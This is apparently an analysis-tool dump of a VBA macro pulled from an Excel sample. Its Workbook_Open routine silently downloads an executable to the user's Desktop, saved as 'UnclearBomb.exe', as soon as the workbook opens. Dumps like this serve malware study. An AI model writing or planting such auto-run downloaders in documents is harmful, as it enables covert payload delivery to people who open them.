Filename     : ./macros/5f484a213cb069c72e31cdb2d90572a5e11e2ba1e2ee7540a46a6b08a033515f
OLE stream   : _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA filename : ThisWorkbook.cls
----------------------------------------
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private Sub Workbook_Open()
    Dim oInet As New Inet
    oInet.InetGet "http://www.rarlab.com/rar/wrar531.exe", "c:\users\Terrorist\Desktop\UnclearBomb.exe"
End Sub
